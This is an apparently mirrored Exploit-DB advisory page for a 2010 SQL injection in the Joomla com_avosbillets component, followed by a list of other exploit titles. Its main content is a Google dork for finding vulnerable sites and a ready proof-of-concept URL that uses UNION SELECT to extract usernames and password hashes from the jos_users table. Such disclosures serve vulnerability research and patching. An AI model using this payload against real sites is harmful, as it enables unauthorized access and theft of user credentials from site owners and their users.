Joomla! Component com_avosbillets – SQL Injection

Exploit Database
10 阅读

作者： snakespc

日期： 2010-01-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11223/

#--------------------------------------------------------
#Joomla (com_avosbillets) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_avosbillets"
#Exploit:
#--------
#PoC:
#http://server/index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
----------------------------------------------------------

last Exploits
Joomla! Component com_avosbillets – SQL Injection的更多信息

Joomla! Component AJAX Search for K2 2.2 – SQL Injection：
Shop a la Cart – Multiple Vulnerabilities：
NuSOAP 0.9.5 – ‘nusoap.php’ Cross-Site Scripting：
Oracle WebCenter Sites (FatWire Content Server) – Multiple Vulnerabilities：
AtomCMS v2.0 – SQLi：
phpMyAdmin 4.8 – Cross-Site Request Forgery：
Ane CMS 1 – Persistent Cross-Site Scripting：
WordPress Plugin church_admin – ‘id’ Cross-Site Scripting：